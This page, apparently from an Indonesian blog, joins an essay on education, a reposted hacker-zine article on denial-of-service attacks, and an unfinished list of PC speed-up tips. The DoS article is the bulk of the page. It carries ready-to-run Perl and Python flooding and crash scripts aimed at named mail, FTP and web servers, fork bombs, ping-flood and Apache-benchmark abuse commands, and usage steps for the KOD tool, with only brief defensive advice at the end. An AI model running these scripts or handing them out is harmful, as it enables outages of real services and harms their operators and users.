Pentingnya Tradisi Kemerdekaan Berpikir dalam Pendidikan Kita

TULISAN S.N. Ratmana yang berjudul Pendidikan Kita Bikin Sesak Napas? (Kompas, 2/10/1996), sangat menarik untuk dibicarakan dan didiskusikan. Penulis begitu merisaukan dunia pendidikan di Indonesia (kini) yang seakan sudah tidak diketahui arah dan tujuannya. Di lain pihak kita begitu mendambakan lahirnya anak didik yang berprestasi dan bernilai baik, tetapi di lain pihak kita sendiri mengabaikan norma-norma dasar pendidikan (pedagogik) yang semestinya, yakni pendidikan yang didasarkan atas penjiwaan dan naluri nurani anak didik sendiri.

Dalam tulisan ini saya mencoba untuk sekadar menambah atau mempertajam kegelisahan apa yang telah dipaparkan oleh S.N. Ratmana. Dan menurut pandangan saya, dunia pendidikan kita sekarang bukan saja sudah "terjangkit" penyakit sesak napas, tetapi sudah (mungkin) lebih menjurus pada stadium penurunan mutu pendidikan.

Kita mungkin masih ingat, kerap sebuah pameo dilontarkan di tengah masyarakat, bahwa bila terjadi pergantian seorang menteri maka akan berganti pula kebijakannya, dan biasanya akan diikuti pula dengan perubahan kurikulum yang digunakan sesuai dengan selera bapak menteri yang baru tadi. Apakah pameo ini benar? Kita akan sulit mendapat jawabannya dengan pasti. Tetapi, kebijakan pendidikan yang sering berubah bila seorang menteri yang baru tampil, adalah sebuah fakta. Oleh karena itulah, karena pameo tidak boleh diyakini sebagai fakta maka masyarakat sering dibuat bingung.

Isu pendidikan yang kini sedang hangat dibicarakan di masyarakat adalah masalah merosot dan rendahnya mutu pendidikan kita. Gejalanya dapat dilihat dari banyaknya sekolah-sekolah eksklusif yang dibangun pihak swasta yang menjanjikan sistem pendidikan prima, lengkap dengan fasilitas dan guru-guru asingnya, atau semakin "berbondong-bondongnya" orang kaya menyekolahkan anaknya ke luar negeri dengan harapan mereka mendapat pendidikan yang lebih baik. Lantas, jika demikian apa yang sebenarnya terjadi dengan dunia pendidikan kita ?

Tradisi kebebasan berpikir

Masalah mutu pendidikan tampaknya telah menjadi keprihatinan berbagai pihak. Banyak pakar membicarakannya, mereka tidak hanya berasal dari kalangan yang ahli di bidang teknis pendidikan semata, tetapi juga para pengamat berbagai disiplin ilmu yang merasa prihatin atas kondisi ini. Dengan "urun rembuk-nya" mereka dalam persoalan ini semakin menambah pemahaman kita akan pentingnya masalah ini agar segera cepat dibenahi. Ini menunjukkan, bahwa ternyata masalah kemerosotan kualitas pendidikan semakin kompleks dan pelik. Ia tidak hanya menyangkut hal-hal yang bersifat teknis kependidikan semata, seperti kurikulum, rasio guru-murid, sistem pengajaran, sarana dan fasilitas, tetapi juga tidak terlepas dari kondisi sosiokultural masyarakat.

Suatu fenomena yang erat kaitannya dengan menurunnya kualitas pendidikan adalah kurang suburnya tradisi kebebasan berpikir kreatif di dalam masyarakat. Apa yang dimaksud dengan kebebasan berpikir kreatif di sini adalah suatu budaya di mana output intelektualitas seseorang sangat dihargai, ia tidak hanya berupa simbol-simbol dan status akademik yang selama ini banyak dipuji-puji dan dikagumi. Tetapi yang lebih penting di sini adalah kemampuan riil yang dihasilkan atas kemampuan intelektual seseorang. Kemampuan riil inilah yang kita tidak bisa mengukurnya dengan hanya nilai angka.

Kondisi tidak kondusif seperti di atas diakui tumbuh subur pada masyarakat kita dan sulit dipisahkan dari perilaku kita sehari-hari. Misalnya orangtua begitu mendambakan anaknya menjadi sarjana, karena kalau anaknya tidak menyandang gelar sarjana, gengsi keluarga menjadi taruhannya. Atau bila sang anak telah lulus kuliah ia harus bekerja di kantor pemerintah menjadi pegawai negeri, atau bila ia bekerja di perusahaan swasta, harus lebih dulu tahu apakah perusahaan itu "bonafide" atau tidak.

Di sini jelas terlihat keberhasilan anak yang ditandai dengan memperoleh predikat sarjana atau status pegawai negeri seolah-olah dianggap sebagai suatu yang luar biasa. Tetapi bagaimana ketika "puncak harapan" itu sirna dan si anak harus mulai berkiprah di dalam masyarakat, atau ia dihadapkan dengan persaingan mencari pekerjaan yang ternyata sulit. Di sini tidak jarang ia mengalami suatu keadaan yang sebaliknya. Jika semula ia dikagumi karena status kesarjanaannya, kini ia dipojokkan karena simbol kesarjanaannya, bahkan yang lebih tragis lagi bila sang anak sudah didudukkan sebagai tonggak harapan keluarga

Pola interaktif

Faktor lain yang bisa menghambat tumbuhnya tradisi kebebasan berpikir bagi anak didik adalah adanya "mitos" bahwa orangtua harus selalu berada pada posisi yang dominan, dan tidak dibenarkan seorang anak memiliki pemikiran lain kecuali menuruti kehendak berpikir orangtuanya. Contoh lain, bisa dilihat dalam hubungan guru-murid atau dosen-mahasiswa. Selama ini ukuran pintar tidaknya seorang murid atau mahasiswa didasarkan atas nilai formalnya. Seorang murid dengan nilai yang tinggi akan dihargai secara simbolis berupa predikat sang juara atau teladan. Tetapi bagaimana dengan nasib siswa yang sebenarnya memiliki kemampuan berpikir kreatif yang tinggi dan bersikap kritis, namun tidak dapat memunculkannya dalam nilai-nilai angka. Karena tiadanya penilaian atau metode evaluasi objektif yang sesuai dengan pola pikir anak. Masa depan anak berkemampuan seperti inilah yang tidak jarang lebih buruk nasibnya dibanding mereka yang tidak pintar sekali pun. Karena mereka secara konseptual sudah terpinggirkan dari "gelanggang" pengajaran yang "diwasiti" oleh guru.

Dengan menyadari tidak berkembangnya tradisi kebebasan berpikir dalam dunia pendidikan seperti sekarang, satu alternatif yang bisa dicoba adalah melakukan perubahan secara nyata berupa perombakan kebiasaan berpikir, baik di dalam lingkungan keluarga maupun sekolah. Penerapan sistem mendidik Cara Belajar Siswa Aktif (CBSA) di sekolah-sekolah adalah sebuah gejala yang baik. Sejauh sistem CBSA tidak diterapkan coba-coba, upaya ini merupakan satu tahap awal keterbukaan dalam pendidikan, atau dapat disebut adanya sedikit perubahan dalam cara berpikir.

Demikianlah pidato saya jika ada kata-kata saya yang salah mohon di maafkan karena kesalahan itu adalah milik kita manusia sedangkan kebenaran itu datangnya dari sang pencipta.

Read More

Serangan Denial Of Service

echo-zine 02
Oleh: MOBY (echo-staff)
      moby@echo.or.id || mobygeek@telkom.net


  .o0 Kata Pengantar

	Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of
        Service atau yang lebih kita kenal dengan DoS.   Beberapa pertanyaan 
        yang mungkin bisa terjawab diantaranya :
	
		1. Apa itu DoS ?
		2. Apa motif cracker untuk melakukan itu ?
		3. Bagaimana cara melakukannya ?
		4. Apa yang harus saya lakukan untuk mencegahnya ?

	Semuanya untuk anda, ENJOY !!.  
	
  .o0 Apa itu Denial of Service (DoS) ?

	Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) 
        atau   mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat 
        menggunakan   layanan tersebut. Dampak akhir   dari  aktifitas ini menjurus 
        kepada    tehambatnya aktifitas korban yang dapat   berakibat  sangat fatal 
        (dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
         yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
        admin akan berada  pada kondisi yang membingungkan   antara   layanan  dan 
        kenyamanan terhadap keamanan.  Seperti yang kita tahu, keyamanan berbanding 
        terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti 
        hukum ini.

	Beberapa aktifitas DoS adalah:
		
		1. Aktifitas 'flooding' terhadap suatu server.
		2. Memutuskan koneksi antara 2 mesin.
		3. Mencegah korban untuk dapat menggunakan layanan.
		4. Merusak sistem agar korban tidak dapat menggunakan layanan.


  .o0 Motif penyerang melakukan Denial of Service

	Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker 
        dalam melakukan Denial of Service yaitu:

		1. Status Sub-Kultural.
		2. Untuk mendapatkan akses.
		3. Balas dendam.
		4. Alasan politik.
		5. Alasan ekonomi.
		6. Tujuan kejahatan/keisengan.

	Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih 
        tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum 
        dikalangan hacker-hacker muda untuk menjukkan kemampuannya  dan  Denial of
        Service merupakan aktifitas   hacker diawal karirnya.  Alasan politik  dan 
        ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita 
        bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan 
        secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
        Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
        DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, 
        komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan 
        merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk 
        mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, 
        jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of 
        Service dengan sangat tepat, dan yang terpenting sangat mudah untuk 
        melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell 
        yang berupa ./nama_program argv argc ...
	

  .o0 Denial of Sevice, serangan yang menghabiskan resource.

	Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource 
 	yang besar, sehingga komputer/mesin yang diserang   kehabisan  resource dan
	manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:
		
		A. Swap Space
		B. Bandwidth
		C. Kernel Tables
		D. RAM
		E. Disk
		F. Caches
		G. INETD

  A. Swap Space
	
	Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan 
	client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
	spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa   serangan 
	Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

  B. Bandwidth

	Beberapa serangan Denial of Service menghabiskan bandwidth.

  C. Kernel Tables

	Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi 
	memori kepada kernel juga merupakan target serangan yang sensitif. Kernel 
	memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak 
	bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

  D. RAM

	Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak 
	mau harus di re-boot.

  E. Disk

	Serangan klasik banyak dilakukan dengan memenuhi Disk.

  F. Caches

  G. INETD

	Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan 
	bekerja.


  .o0 Teknik Melakukan Denial of Service

	Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan 
	dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya 
	adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga 
	tidak begitu menarik.
	Kita akan bahas tipe-tipe serangan DoS.
	
		1. SYN-Flooding
		   SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
 		   pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
		   lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of 
		   Service dengan mencegahmenolak cracker untuk mengakses sistem.  
		2. Pentium 'FOOF' Bug
		   Merupakan serangan Denial of Service terhadap prosessor Pentium yang 	
		   menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis 
		   sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor 
		   yang digunakan yaitu pentium.   
		3. Ping Flooding
		   Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan 
		   dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka 
		   mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). 
		   Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. 
		   Varian dari serangan ini disebut "smurfing" 
		   (http://www.quadrunner.com/~chuegen/smurf.txt).  

	Serangan menggunakan exploits.

		Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
			A. Serangan membutuhkan Shell Linux (Unix/Comp)
			B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan 
			   fungsi search agar lebih mudah)
			C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

		1. KOD (Kiss of Death)
		   Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
		   Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah 	
		   membuat hang/blue screen of death pada komputer korban.
		   Cara penggunaan:
		   A. Dapatkan file kod.c
		   B. Compile dengan Gcc: $ gcc -o kod kod.c
		   C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]  
		   Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
		   kepada jenis sistem operasi dan konfigurasi server target (misalmya: 
	 	   blocking) 
		2. BONK/BOINK
		   Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari 
		   bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
		3. Jolt
		   Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt 
		   yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet 	
		   yang tinggi sekali kepada korban.
		4. NesTea
		   Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows 
		   versi awal. Versi improve dari NesTea dikenal dengan NesTea2 
		5. NewTear
		   Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk 	
		   (bonk.c)
		6. Syndrop 
		   Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target 	
		   serangan adalah Linux dan Windows 
		7. TearDrop
		   TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung 
		   ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug 
		   yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini 	
		   adalah Blue Screen of Death 

	Serangan langsung (+ 31337)

		1. Ping Flood
		   Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya 
		   sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
		   bash # ping -fs 65000 [ip_target]
		2. Apache Benchmark
		   Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) 	
		   suatu web server, namun tidak tertutup kemungkinan untuk melakukan 		
		   penyalahgunaan.
		   bash $ /usr/sbin/ab -n 10000 -c 300 \ 
		   http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
		   (diketik dalam 1 baris!)
		   Akan melakukan 10000 request paralel 300 kepada host korban.com 
		3. Menggantung Socket
		   Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal 	
		   oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak 	
		   koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. 	
		   Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 	
		   request simultan dengan koneksi terpisah-pisah. 

		   Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan 	
	 	   menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). 	
		   Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa 
		   batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache 
		   akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, 		
	   seolah-olah server korban tewas. 

	Script gs.pl (gantung socket)      

	#!/usr/bin/perl
	#
	# Nama Script  : gs.pl
	# Tipe         : Denial of Service (DoS)
	# Auth         : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
	# URL          : www.echo.or.id
	# 
	use IO::Socket;
	if (!$ARGV[1]) {
		print "Gunakan: perl gs.pl [host] [port] \n";
		exit;
	}
	for (1..1300) {
		$fh{$_}=new IO::Socket::INET
			PeerAddr=> "$ARGV[0]",
			PeerPort=> "$ARGV[1]",
			Proto => "tcp"
	or die; print "$_\n"
	}
	# END. 27 Oktober 2003 
	# Lakukan dari beberapa LoginShell (komputer) !

		DoS-ing Apache lagi !!

			Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

	1. Fork Bomb, habiskan RAM
	
	#!/usr/bin/perl
	fork while 1;
	
	2. Habiskan CPU
	
	#!/usr/bin/perl	
	for (1..100) { fork or last }
	1 while ++$i

	3. Habiskan Memory

	#!/usr/bin/perl
	for (1..20) { fork or last }
	while(++$i) { fh{$i} = "X" x 0xff; }

		4. Serangan Input Flooding
		   Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote 	
		   Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat 	
		   terjadi secara remote jika demon (server) tidak melakukan verifikasi input 	
		   sehingga input membanjiri buffer dan menyebabkan program dihentikan secara 	
		   paksa.  
			
		   Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.  

	1. Serangan kepada IISPop EMAIL Server.
	   Sofie   : Email server
	   Vendor  : http://www.curtiscomp.com/
	   TIPE    : Remote DoS
	   
	   IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, 	
   versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181
	
	Script: iispdos.pl
	
	#!/usr/bin/perl -w
	#
	# $0_            : iispdos.pl
	# Tipe serangan  : Denial of service
	# Target         : IISPop MAIL SERVER V. 1.161 & 1.181
	# Auth           : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
	# URL            : www.echo.or.id
	#
	use IO::Socket;
	if (!$ARGV[0]) {
		print "Gunakan: perl iispdos.pl [host] \n";
		exit;
	}
	# Data 289999 bytes
	$buff = "A" x 289999; 
	
	print "Connecting ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr=> "$ARGV[0]", 
					PeerPort=> "110", 
					Proto=> "tcp") or die;
					print "Error: $_\n";
	print "Connect !!\n";
	print $connect "$buff\n";
	close $connect;
	print "Done \n";
	print "POST TESTING setelah serangan \n";
	print "TEST ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr => "$ARGV[0]",
					PeerPort => "110",
					Proto => "tcp") or die;
					print "Done !!, $ARGV[0] TEWAS !! \n";

	print "Gagal !! \n";
	close $connect;
	# END. 

	2. Membunuh wzdftpd.
	   Sofie   : wzdftpd 
           Vendor  : http://www.wzdftpd.net
 	   
	Proof of Concept:
	
	% telnet 127.0.0.1 21
        Trying 127.0.0.1...
	Connected to localhost.novel.ru.
	Escape character is '^]'.
	220 wzd server ready.
	USER guest
	331 User guest okay, need password.
	PASS any
	230 User logged in, proceed.
	PORT
	Connection closed by foreign host.
	% telnet 127.0.0.1 21
	Trying 127.0.0.1...
	telnet: connect to address 127.0.0.1: Connection refused
	telnet: Unable to connect to remote host

	wzdftpd crash setelah diberikan perintah/command PORT !

	3. Serangan 32700 karakter, DoS BRS WebWeaver.
	   Sofie : BRS WebWeaver V. 1.04
	   Vendor : www.brswebweaver.com
	   BugTraqer : euronymous /F0KP

	}------- start of fadvWWhtdos.py ---------------{

	#! /usr/bin/env python
	## #!/usr/bin/python (Py Shebang, MOBY)
	###
	# WebWeaver 1.04 Http Server DoS exploit 
	# by euronymous /f0kp [http://f0kp.iplus.ru]
	########
	# Usage: ./fadvWWhtdos.py
	########

	import sys
	import httplib

	met = raw_input("""
	What kind request you want make to crash webweaver?? [ HEAD/POST ]: 
	""")
	target = raw_input("Type your target hostname [ w/o http:// ]: ")
	spl = "f0kp"*0x1FEF
	conn = httplib.HTTPConnection(target)
	conn.request(met, "/"+spl)
	r1 = conn.getresponse()
	print r1.status

	}--------- end of fadvWWhtdos.py ---------------{

	Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

	4. Buffer Overflow pada MailMAX 5
	   Sofie     : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
	   Vendor    : http://www.smartmax.com
	   BugTraqer : matrix at 0x36.org

	Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command 
	SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara 
	manual.

	Contoh eksploitasi:
	                      --------[ transcript ]-------
	nc infowarfare.dk 143
	* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
	0000 CAPABILITY
	* CAPABILITY IMAP4rev1
	0000 OK CAPABILITY completed
	0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
	0001 OK User authenticated.
	0002 SELECT "aaa...[256]...aaaa"
                      	      --------[ transcript ]-------
	   
	Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool 
	ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat' 

	
	Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - 
	membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada 
	komputer esekutor yang memiliki bandwidth lebar.
	
	Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
	A. Connect ke korban (host, port).
	B. Kirimkan paket data dalam jumlah besar. 
	C. Putuskan koneksi > selesai.

	Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. 
	Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (	
        port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim). 

	-- udos.pl --
  	    
	#!/usr/bin/perl
	#
	# $0   : udos.pl
	# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
	# URL  : www.echo.or.id
	#
	use IO::Socket;
	#
	if (!$ARGV[2]) {
		print "Gunakan % perl udos.pl [host] [port] [data] \n";
		print "Contoh :\n";
		print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
		exit;
	}
	# Siapkan data 
	$buffer = "A" x $ARGV[2];
	# Connect -> Korban
	print "Connecting ... -> $ARGV[0] \n";
	$con = new IO::Socket::INET (  
			PeerAddr=> "$ARGV[0]",
			PeerPort=> "$ARGV[1]",
			Proto=> "tcp") or die;
			print "Error: $_ \n";
	# Connect !
	print "Connect !! \n";
	print $con "$buffer\n";
	close $con;
	print "Done. \n";
	print "POST TESTING setelah serangan \n";
	print "TEST ... >> $ARGV[0] \n";
	$connect = new IO::Socket::INET (
					PeerAddr => "$ARGV[0]",
					PeerPort => "$ARGV[1]",
					Proto => "tcp") or die;
					print "Done !!, $ARGV[0] TEWAS !! \n";

	print "Gagal !! \n";
	close $connect;
	# End.

	-- udos.pl --

	Skrip sederhana diatas hanya melakukan hubungan dengan server korban, 
	lalu mengirimkan flood dan melakukan post testing. Dengan sedikit 
	pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force 
	Flooder', tergantung pada kreatifitas anda !   


  .o0 Penanggulangan serangan Denial of Service

	Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana 
	mudahnya menggunaka sploits/tool   untuk membekukan   Ms Windows, atau
	bagaimana mudahnya melakukan input flooding dan membuat tool   sendiri. 
	Namun Denial of service adalah masalah layanan publik.Sama halnya dengan 
	anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai 
	sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
	'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
	kekanak-kanakan demikian tentu tidak anda harapkan.

  1. Selalu Up 2 Date.
 	Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
	Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
	untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option 
	untuk menolak cracker untuk mengakses system.

  2. Ikuti perkembangan security
	Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. 
	Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
	security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' 
	dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - 
	tidak tertutup kemungkinan untuk melakukan Denial of Service -.
	Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung 
	dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
	 atau melakukan up-date.

  3. Teknik pengamanan httpd Apache.
	+ Pencegahan serangan Apache Benchmark.
	Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan 
	identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui 
	firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). 
	Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang 
	admin harus teliti.
	Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi 
	jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'. 
	Jangan lupa juga menambah RAM.

  4. Pencegahan serangan non elektronik.
	Serangan yang paling efektif pada dasarnya adalah local. Selain efektif 
	juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, 
	atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa 
	menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan 
	dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
	admin dan user bersangkutan.  


  .o0 Penututp.

	Berbicara masalah security merupakan hal yang mengasikkan. Teknik-teknik 
	intrusi baru begitu unik dan sebagai seorang geek saya yakin 'keindahan 
	pengetahuan diatas segalanya'. Anda tidak akan melakukan hal-hal bodoh 
	seputar dokumen ini dan ingat selalu 'kita tidak pernah tahu segalanya'. 
	Mulailah belajar, perhatikan dunia dan kuasai ! Anda akan terkagum, 
	betapa indahnya semesta ini.
	Terima kasih untuk anda semua telah membaca artikel ini - bahkan sampai 
	baris ini :) -. Terima kasih untuk rekan-rekan echo-staff atas support 
	selama ini. Untuk semua Computer Security Industries Indonesia, teruslah 
	berjuang Amigo !! Computer Underground, hey nak, sudah saatnya belajar 
	dan berhenti bermain. Semua teman-teman online TERIMA KASIH !!
	Shout buat Willy, Al, Dudunk - semua pengunjung 'rumah mesum' :P 
	(cuma istilah/jargon) - Thanks buat Rizka, maaf atas 'pesan-pesan filosofi 
	gelap', kamu tahu pemilik nomor 08157190*** !. "Ka .. tidak baik marah 
	kepada seseorang yang datang dengan kasih sayang :)"

	"KALAU AKU SEORANG ATEIS, MAKA AKAN AKU KATAKAN:
		'TEMPAT YANG PALING AMAN ADALAH PETI MATI'
	TAPI TERNYATA AKU SALAH !!"
						[MOBY]

 
Bacaan lanjutan / referensi:
	
	[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
	    R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
	    Elexmedia Komputindo, ISBN: 979-20-3249-5
	[2] 7 Cara Isengi Apache dan kiat mengatasinya.
	    Steven Haryanto, Masterweb Magazine Oktober 2001
	[3] Introduction to Denial of Service
	    Hans Husman, t95hhu@student.tdb.uu.se
	[4] CERT ADVISORIES.
	    www.cert.org
	[5] Packet Storm Security
	    http://packetstormsecurity.nl
	[6] BugTraq
	    www.securityfocus.com
	        
 sumber : http://ezine.echo.or.id/ezine2/ddos~Moby.txt

Read More

8 Cara Paling Mudah Untuk Mempercepat Komputer

Belajar komputer pada perawatan komputer. Seiring berjalannya waktu, kecepatan komputer dengan sistem operasi Microsoft Windows mulai menurun. Ini akan terasa pada kenyataan bahwa sistem mengambil lebih banyak waktu untuk menanggapi tindakan Anda seperti membuka file, folder, berselancar di Internet dan tugas-tugas lain. Namun, ada hal yang dapat Anda lakukan untuk mempercepat komputer Anda. Berikut ini adalah daftar cara yang dapat Anda tempuh untuk meningkatkan performa komputer Anda kembali. Langkah-langkah ini dimaksudkan untuk digunakan dalam urutan, jangan dibolak-balik. Kuncinya adalah melakukan yang paling sederhana dan paling mudah.

Jika Anda ingin meningkatkan atau mempercepat komputer Anda, tidak perlu menginstall maca-macam software untuk tujuan itu. Namun, di atas segalanya, apa yang akan Anda lakukan disini tidak membahayakan dan di luar ruang lingkup forum Windows, pilihan lain adalah mintalah bantuan dari orang yang Anda kenal baik. Ingat: Anda punya waktu.Anda dapat menghentikan proses yang akan saya bahas berikut ini tanpa menyebabkan kerusakan. Jadi jika Anda pemula, jangan takut. Langkah-langkah untuk Speed Up Mempercepat Komputer;

1. Pastikan Hardware Anda

Apa artinya? Artinya bahwa memang sebelumnya komputer Anda cepat namun karena waktu maka menjadi lambat. Adalah hal yang mustahil untuk mempercepat komputer jika mainboard misalnya hanya mendukung Pentium 3. Jadi syarat pertama adalah hardware harus memungkinkan untuk lari kencang.

2. Bersihkan Desktop Anda

Apakah Anda Windows Desktop Anda penuh dihiasi dengan file? Pernahkah Anda memperhatikan bahwa komputer Anda telah berjalan lebih lambat dan lebih lambat lagi? Apakah Anda melihat cahaya hard drive sering berkedip sementara Anda menunggu komputer untuk menanggapi tindakan? Ada beberapa langkah yang dapat Anda ambil untuk memperbaikinya. Jangan terlalu banyak file berserakan di desktop karena secara signifikan walaupun kecil akan mempengaruhi kinerja komputer. Jadi simpanlah file pada tempatnya. Apa bedanya menyimpan banyak file didesktop dengan didrive Data? Yaitu bahwa desktop adalah bagian dari drive C: (umumnya untuk sistem) sedangkan drive Data D: (umumnya untuk menyimpan pekerjaan)

3. Scan System Windows Anda untuk mengecek kesalahan

Sebuah sistem operasi adalah kumpulan file yang melakukan fungsi yang berbeda. Hal ini dimungkinkan, dari waktu ke waktu, bahwa satu atau lebih file-file sistem telah berubah atau menjadi rusak. Jika hal ini terjadi, kecepatan sistem Anda bisa berkurang. Dengan menggunakan utilitas yang disebut ” System File Checking”, dia akan memeriksa file-file dengan benar masalah bisa ditemukan.

4. Scan Virus, Spyware dan Adware

